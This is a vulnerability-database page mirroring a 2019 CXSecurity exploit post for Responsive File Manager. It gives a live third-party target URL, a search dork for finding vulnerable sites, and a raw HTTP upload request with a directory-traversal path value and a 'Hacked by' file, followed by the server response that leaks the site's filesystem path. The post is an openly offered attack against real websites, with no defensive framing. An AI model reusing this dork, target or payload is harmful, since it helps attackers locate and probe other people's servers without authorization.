Responsive File Manager to Path Leaked - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1812988 漏洞类型
发布时间 2019-11-06 更新时间 2019-11-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110028
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Live Target: http://pfionline.co.in/assets/tinymce/filemanager/dialog.php
Author: L4663r666h05t

In this case, you need Burpsuite.

Note:
if burpsuite is usually used to intercept, then here I am just trying to make it wrong directory then the response form will appear in the path of the victim's website using responsive file manager.

Dork: inurl:/filemanager/css/
Exploit: /filemanager/dialog.php

Step One: https://pasteboard.co/IFjDTTA.jpg
Step Two: https://pasteboard.co/IFjE8h2.jpg
Last Step: https://pasteboard.co/IFjEk2R.jpg


REQUEST:

POST /assets/tinymce/filemanager/upload.php HTTP/1.1
Host: user.com
Content-Length: 439
Accept: application/json
Cache-Control: no-cache
Origin: http://user.com/
X-Requested-With: XMLHttpRequest
User-Agent: -
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC
Referer: http://user.com/assets/tinymce/filemanager/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac
Connection: close

------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path"

../../../blablabla
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path_thumb"

../thumbs/
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="file"; filename="world.txt"
Content-Type: text/plain

Hacked by L4663r666h05t
------WebKitFormBoundaryWwXMWsA3nGDOf2uC--


RESPONSE:

HTTP/1.1 200 OK
Date: Tue, 05 Nov 2019 18:26:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 84
Content-Type: text/html; charset=UTF-8

wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53)

Path Leaked: /home/user/public_html/

Thanks to: Indonesian Code Party - Exploiter.ID